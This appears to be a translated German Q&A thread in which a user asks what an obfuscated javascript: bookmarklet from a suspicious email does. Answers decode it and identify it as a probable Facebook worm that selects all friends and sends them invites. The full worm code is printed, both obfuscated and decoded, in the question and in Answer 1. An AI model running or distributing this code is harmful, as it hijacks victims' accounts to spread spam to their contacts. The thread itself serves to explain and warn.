Was bewirkt dieser Code?

Question

Ok, jemand, der zufällig ein guter Freund von mir ist, schickt mir in letzter Zeit einige merkwürdige E-Mails, von denen eine einen Link zu einer Seite enthielt, die Sie auffordert, diesen zu kopieren und in die Adressleiste Ihres Browsers einzufügen und ihn dann auszuführen ...

javascript:(function(){a='app125879300771588_jop';b='app125879300771588_jode';ifc='app125879300771588_ifc';ifo='app125879300771588_ifo';mw='app125879300771588_mwrapper';var _0xc100=["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x68\x69\x64\x64\x65\x6E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x76\x61\x6C\x75\x65","\x63\x6C\x69\x63\x6B","\x73\x75\x67\x67\x65\x73\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67","\x6C\x69\x6B\x65\x6D\x65"];d=document;d[_0xc100[2]](mw)[_0xc100[1]][_0xc100[0]]=_0xc100[3];d[_0xc100[2]](a)[_0xc100[4]]=d[_0xc100[2]](b)[_0xc100[5]];d[_0xc100[2]](_0xc100[7])[_0xc100[6]]();setTimeout(function (){fs[_0xc100[8]]();} ,5000);setTimeout(function (){SocialGraphManager[_0xc100[11]](_0xc100[9],_0xc100[10]);} ,5000);setTimeout(function (){d[_0xc100[2]](_0xc100[12])[_0xc100[6]]();d[_0xc100[2]](ifo)[_0xc100[4]]=d[_0xc100[2]](ifc)[_0xc100[5]];} ,5000);})();

Da ich nicht ganz bei der Sache bin, wenn es um Low-Level-Programmierung geht, bin ich neugierig, was die E-Mail hier will ...

BITTE FÜHREN SIE DIESEN CODE NICHT AUS, WENN SIE NICHT SICHER SIND, DASS ER NICHTS KAPUTT MACHT.

Aber ... Kann mir jemand sagen, was es bewirkt?

Answer 1

a = 'app125879300771588_jop';
b = 'app125879300771588_jode';
ifc = 'app125879300771588_ifc';
ifo = 'app125879300771588_ifo';
mw = 'app125879300771588_mwrapper';
var _0xc100 = ["visibility", "style", "getElementById", "hidden", "innerHTML", "value", "click", "suggest", "select_all", "sgm_invite_form", "/ajax/social_graph/invite_dialog.php", "submitDialog", "likeme"];
d = document;
d[_0xc100[2]](mw)[_0xc100[1]][_0xc100[0]] = _0xc100[3];
d[_0xc100[2]](a)[_0xc100[4]] = d[_0xc100[2]](b)[_0xc100[5]];
d[_0xc100[2]](_0xc100[7])[_0xc100[6]]();
setTimeout(function () {
    fs[_0xc100[8]]();
}, 5000);
setTimeout(function () {
    SocialGraphManager[_0xc100[11]](_0xc100[9], _0xc100[10]);
}, 5000);
setTimeout(function () {
    d[_0xc100[2]](_0xc100[12])[_0xc100[6]]();
    d[_0xc100[2]](ifo)[_0xc100[4]] = d[_0xc100[2]](ifc)[_0xc100[5]];
}, 5000);

Dabei handelt es sich höchstwahrscheinlich um eine Adaption eines der vielen Facebook-Würmer, die sich an alle Ihre Freunde schicken.

Siehe aquí für eine ähnliche Frage.

Andere Versionen verwendeten p.a.c.k.e.r zur Verschleierung, und diese konnten leicht entschleiert werden, indem man den p.a.c.k.e.r-Code durch http://jsbeautifier.org/

Answer 2

Es ist ein verschleiert bookmarklet . Sie können die Verschlüsselung (vorsichtig) aufheben, um das tatsächliche Javascript zu sehen, das es ausführen wird. Wenn Sie das nicht unbedingt brauchen, lohnt sich die Mühe wahrscheinlich nicht. Ich würde es in den Mülleimer werfen und mit meinem Freund abklären, ob es wirklich von ihm/ihr stammt, und wenn ja, warum.